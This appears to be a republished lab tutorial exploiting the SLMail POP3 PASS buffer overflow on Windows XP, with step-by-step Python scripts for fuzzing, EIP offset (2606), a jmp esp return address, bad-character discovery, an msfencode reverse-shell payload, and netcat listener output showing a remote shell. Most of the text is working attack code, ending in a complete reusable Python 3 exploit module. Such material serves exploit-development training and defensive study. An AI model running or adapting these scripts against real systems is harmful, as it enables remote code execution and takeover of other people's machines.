2025-01-16 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
I don't write much with advice.
Environment:
Attack machine: Kali 2.0. Target machine: Windows XP (Windows Server 2003 does not work for this experiment; it was tried many times without success, but if you are interested you can try it). Software: SLMail, Immunity Debugger, mona.py. If you need the software, you can leave a message.
Overall steps:
1. Test for the buffer overflow.
2. Find the exact position (offset) at which the overflow overwrites EIP, and verify it.
3. Find a module loaded at a fixed address in the system that contains a jmp esp, so that execution can be redirected to the stack.
4. Write the address found in step 3 at the position found in step 2, i.e. go from EIP to jmp esp. Set a breakpoint on the jmp esp to verify that the jump succeeds.
5. Determine which bad characters exist; they differ from service to service.
6. Generate shellcode and send it.
7. Done.

Step 1. Test the POP3 connection with a Python script. Start the POP3 service on Windows first.
Use the following Python script to test the connection (Python 2, the /usr/bin/python on Kali 2.0):

    #!/usr/bin/python
    import socket

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        print "\nSending evil buffer..."
        s.connect(('10.10.10.19', 110))      # SLMail POP3 on the target
        data = s.recv(1024)                  # banner
        print data
        s.send('USER test\r\n')
        data = s.recv(1024)
        print data
        s.send('PASS test\r\n')
        data = s.recv(1024)
        print data
        s.close()
        print "\nDone!"
    except:
        print "\nFailed to connect pop3"
Running result:

    root@kal:/test# ./01.py

    Sending evil buffer...
    +OK POP3 server example.com ready
    -ERR unable to lock mailbox

    Done!

This shows that the connection to POP3 works.
Step 2. Test whether a buffer overflow occurs
On the Windows side, the SLMail service has to be opened in Immunity Debugger:
Open Immunity => File => Attach => select the SLMail process in the list.
Click Attach in the lower right corner, then let it run (F9). While it runs, the "Paused" status in the lower right corner changes to "Running".
Now run the following script:
    #!/usr/bin/python
    import socket

    # Build a list of "A" strings of growing length: 100, 300, 500, ...
    # (the step size and number of rounds are the usual values; they are not
    # preserved in this copy of the script)
    buffer = ["A"]
    counter = 100
    while len(buffer) <= 30:
        buffer.append("A" * counter)
        counter = counter + 200

    for string in buffer:
        print "Fuzzing PASS with %s bytes" % len(string)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(('10.10.10.19', 110))
        s.recv(1024)
        s.send('USER test\r\n')
        s.recv(1024)
        s.send('PASS ' + string + '\r\n')
        s.send('QUIT\r\n')
        s.close()

Watch the debugger while it runs: the length at which the service crashes shows roughly where the overflow is. The exact offset at which EIP is overwritten, used by all the scripts below, is 2606 bytes.

Finding the jmp esp: assembling jmp esp (for example with Metasploit's nasm_shell) gives its opcode:

    nasm > jmp esp
    00000000  FFE4              jmp esp

When searching for these bytes in Immunity with mona, they have to be entered in hex with \x, i.e. "\xff\xe4" (the article does not show the exact command; the usual form is `!mona find -s "\xff\xe4"`, with `-m` to restrict the search to one module). The first hit is used as the jmp esp.
Double-click the first jmp esp found, and you can see that its address is 5F4A358F.
Step 6. Test the jump
Set a breakpoint on the address above (the jmp esp at 5F4A358F).
Send the following script:

    #!/usr/bin/python
    import socket

    # 2606 bytes of padding reach EIP. The jmp esp address 5F4A358F is written
    # byte-reversed (little-endian). The "C"s follow it and end up on the stack,
    # which is where ESP points after the jump.
    buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "C" * 900

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        print "\nSending evil buffer..."
        s.connect(('10.10.10.19', 110))
        data = s.recv(1024)
        s.send('USER test\r\n')
        data = s.recv(1024)
        s.send('PASS ' + buffer + '\r\n')
        data = s.recv(1024)
        s.close()
        print "\nDone!"
    except:
        print "\nFailed to connect pop3"
Start the service and send the script.
The lower right corner shows that execution reached the breakpoint and stopped.
Press F7 at this point to step into the jmp esp.
You can see that execution has jumped to the address in ESP, and the memory there contains 43 43 43 ..., i.e. the "C"s.
This means the jump was successful.
Step 7. Determine the bad characters
Restart the service.
Write the following script:

    #!/usr/bin/python
    import socket

    # Every byte value 0x01..0xff, with 0x00 placed last: if a byte acts as a
    # string terminator, everything after it is lost, so a trailing 0x00 costs
    # nothing. Bytes found to be bad are removed and the probe is sent again.
    badchar = (
    "\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
    "\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
    "\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
    "\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
    "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
    "\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
    "\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
    "\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
    "\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
    "\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
    "\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
    "\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
    "\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
    "\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
    "\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
    "\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x00"
    )

    # 2606 bytes reach EIP; "B" * 4 stands in for the return address; the probe
    # comes after it, so it lands on the stack at ESP where it can be dumped.
    buffer = "A" * 2606 + "B" * 4 + badchar

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        print "\nSending evil buffer..."
        s.connect(('10.10.10.19', 110))
        data = s.recv(1024)
        s.send('USER test\r\n')
        data = s.recv(1024)
        s.send('PASS ' + buffer + '\r\n')
        s.close()
        print "\nDone"
    except:
        print "Fail connect target"
Send the script and look at the stack dump on the Windows side (follow ESP in the dump window).
In the dump you can see that 0x0a is missing, and everything after it is missing as well. So remove 0x0a from the list and send again.
After 0x0a is taken out, the bytes after it are displayed, which confirms that 0x0a is a bad character. The dump now stops at \x0d, so it is bad too, and the trailing \x00 is not displayed either.
So three bad characters are found: 0x00, 0x0A, 0x0D. This is what you would expect from a line-based text protocol: CR and LF end the POP3 command line and NUL ends the C string, so any of them cuts the payload short. Other services have different bad characters, which is why this step has to be repeated for each target.
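The elimination above is done by eye in the debugger. The following Python 3 script is an added example, not code from the article: it automates the same loop, generating the probe without the bytes already known to be bad, comparing it with what the debugger shows at ESP, adding the first byte that fails to reproduce, and repeating until the dump matches. The memory dump is simulated by a constructed function that truncates at 0x00, 0x0a and 0x0d, the behaviour observed against SLMail; in a real run you would paste the bytes from Immunity Debugger instead.

```python
# Added example: automate the bad-character elimination of step 7.
# simulate_slmail_dump() is a constructed stand-in for the debugger's memory dump.


def badchar_probe(exclude=(0x00,)):
    """Every byte value except the ones already known to be bad.  0x00 is
    excluded from the start: it terminates C strings, so nothing after it
    would survive."""
    return bytes(b for b in range(256) if b not in exclude)


def as_escaped(data, per_line=16):
    """Render bytes as the "\\x.." string lines used in the exploit scripts."""
    lines = []
    for i in range(0, len(data), per_line):
        chunk = data[i:i + per_line]
        lines.append('"' + "".join("\\x%02x" % b for b in chunk) + '"')
    return "\n".join(lines)


def first_mismatch(sent, dumped):
    """First byte of the probe that is missing or altered in the memory dump,
    or None if the dump reproduces the probe exactly."""
    for i, b in enumerate(sent):
        if i >= len(dumped) or dumped[i] != b:
            return b
    return None


def find_bad_chars(dump_after_send, known=(0x00,), limit=16):
    """Send a probe, compare it with the dump, add the culprit, repeat.

    dump_after_send(probe) must return the bytes the debugger shows at ESP
    after the overflowing PASS.  A bad byte usually truncates or corrupts
    everything after it, so only the first mismatch of each round is trusted.
    """
    bad = list(known)
    for _ in range(limit):
        probe = badchar_probe(bad)
        culprit = first_mismatch(probe, dump_after_send(probe))
        if culprit is None:
            return bytes(sorted(bad))
        bad.append(culprit)
    raise RuntimeError("more than %d bad characters; check the offset" % limit)


def simulate_slmail_dump(probe):
    """Constructed stand-in for reading memory in Immunity Debugger: the POP3
    line parser stops at CR/LF and the C string at NUL, so the dump ends at
    the first of those bytes."""
    cut = len(probe)
    for terminator in (0x00, 0x0a, 0x0d):
        if terminator in probe:
            cut = min(cut, probe.index(terminator))
    return probe[:cut]
```

With the simulated dump, find_bad_chars() returns b"\x00\x0a\x0d", the three bytes found by hand above; as_escaped() prints the remaining probe in the same "\x.." form as the script so it can be pasted into the PASS buffer.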
Step 8. Construct the shellcode
Build a reverse shell payload, encoded so that it contains none of the bad characters:

    root@kal:/usr/share/framework2# ./msfpayload win32_reverse LHOST=10.10.10.11 LPORT=4444 R | ./msfencode -b "\x0d\x00\x0a"
    [*] Using Msf::Encoder::PexFnstenvMov with final size of 310 bytes
    "\x6a\x48\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x0f\x2a\x32"
    (the rest of the 310-byte encoded payload follows as further "\x.." lines)

LHOST is the Kali machine and LPORT the port the listener will wait on; -b lists the bad characters the encoder must avoid. The msfpayload and msfencode tools shown here (from the old framework2 tree) have since been merged into msfvenom, which takes the same LHOST/LPORT options and the same -b list.
Write the script:

    #!/usr/bin/python
    import socket

    # Paste the encoded payload printed by msfencode here, as one string of
    # \x.. escapes (310 bytes). Only the start of the decoder stub is shown.
    shellcode = (
    "\x6a\x48\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13"
    # ... remaining bytes of the msfencode output
    )

    # padding to EIP | jmp esp (little-endian) | NOP sled | shellcode
    buffer = "A" * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 9 + shellcode

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        print "\nSending evil buffer..."
        s.connect(('10.10.10.19', 110))
        data = s.recv(1024)
        s.send('USER test\r\n')
        data = s.recv(1024)
        s.send('PASS ' + buffer + '\r\n')
        data = s.recv(1024)
        s.close()
        print "\nDone!"
    except:
        print "\nFailed to connect pop3"

The \x90 bytes are NOPs: they do nothing when executed and act as padding so the first bytes of the shellcode are not lost. The fnstenv-based decoder stub that msfencode prepends writes its environment block onto the stack at ESP, which is exactly where the payload sits after jmp esp; the NOPs absorb that write so that no shellcode bytes that have not yet run are overwritten.
Start the SLMail service on Windows, listen on port 4444 on Kali, then send the script to get the reverse shell:

    root@kal:/test# nc -lvp 4444
    listening on [any] 4444 ...
    10.10.10.19: inverse host lookup failed: Unknown host
    connect to [10.10.10.11] from (UNKNOWN) [10.10.10.19] 1158
    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\Program Files\SLmail\System>

The shell comes back on the listener, running in the context of the SLMail service.
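The scripts above repeat the same socket boilerplate at every step. As an added example, not the article's own code, here is the chain from step 2 to step 8 in one Python 3 module: the length-stepping fuzz loop with crash detection, the payload layout (padding to the offset, little-endian return address, NOP sled, shellcode), a check that neither the return address nor the shellcode contains the bad characters from step 7, and the POP3 USER/PASS exchange. The target address, offset 2606, jmp esp address 5F4A358F and bad characters 00/0a/0d are the article's values; the function names are ours, and the shellcode argument is whatever msfencode produced, which is not reproduced here.

```python
import socket
import struct

# Values from the article; everything else in this module is an added example.
TARGET = ("10.10.10.19", 110)    # SLMail POP3 on the Windows XP target
OFFSET = 2606                    # bytes of padding before EIP is overwritten
JMP_ESP = 0x5F4A358F             # address of the jmp esp found with mona
BAD_CHARS = b"\x00\x0a\x0d"      # bad characters found in step 7
NOP_SLED = 9                     # NOPs between the return address and the shellcode


def ret_bytes(addr):
    """Pack the return address little-endian: 0x5F4A358F -> 8f 35 4a 5f."""
    return struct.pack("<I", addr)


def check_bad_chars(label, data, bad=BAD_CHARS):
    """Refuse to send anything that contains a byte the target mangles."""
    hits = sorted(set(b for b in data if b in bad))
    if hits:
        raise ValueError("%s contains bad chars: %s"
                         % (label, ", ".join("0x%02x" % h for h in hits)))


def build_payload(shellcode, offset=OFFSET, ret=JMP_ESP, nops=NOP_SLED, bad=BAD_CHARS):
    """padding | ret (little-endian) | NOP sled | shellcode, audited for bad chars."""
    ret_le = ret_bytes(ret)
    check_bad_chars("return address", ret_le, bad)
    check_bad_chars("shellcode", shellcode, bad)
    return b"A" * offset + ret_le + b"\x90" * nops + shellcode


def fuzz_lengths(start=100, step=200, rounds=30):
    """Lengths tried by the fuzzing loop: 100, 300, 500, ..."""
    return [start + step * i for i in range(rounds)]


def pop3_pass(conn, password, user=b"test"):
    """Banner, USER, PASS on an open socket-like object; returns the three replies."""
    replies = [conn.recv(1024)]
    conn.sendall(b"USER " + user + b"\r\n")
    replies.append(conn.recv(1024))
    conn.sendall(b"PASS " + password + b"\r\n")
    replies.append(conn.recv(1024))
    return replies


def find_crash_length(make_conn, lengths=None):
    """Send growing PASS arguments until the service stops answering.

    make_conn() must return a socket-like context manager.  A connection error
    or an empty read after the PASS means the service died, and that length is
    returned.  If the crashing request still gets a reply, the next connect is
    refused and the following length is reported instead, so confirm the exact
    length in the debugger.
    """
    for n in lengths or fuzz_lengths():
        try:
            with make_conn() as conn:
                replies = pop3_pass(conn, b"A" * n)
        except OSError:          # refused, reset, or timed out
            return n
        if not replies[-1]:      # server closed the connection without answering
            return n
    return None


def exploit(shellcode, target=TARGET, timeout=5.0):
    """Deliver the final payload; returns its length.  The shell arrives on the
    nc listener, not on this connection."""
    payload = build_payload(shellcode)
    with socket.create_connection(target, timeout=timeout) as conn:
        try:
            pop3_pass(conn, payload)
        except OSError:
            pass                 # the overflowed process usually never answers
    return len(payload)
```

Against a live target the fuzzing step is `find_crash_length(lambda: socket.create_connection(TARGET, timeout=5))`, and the final step is `exploit(shellcode)` with the nc listener already running on 10.10.10.11:4444. build_payload() refuses to send a payload that would be cut short by a bad character, which catches the mistake of pasting an unencoded shellcode or a return address that happens to contain 0x0a or 0x0d.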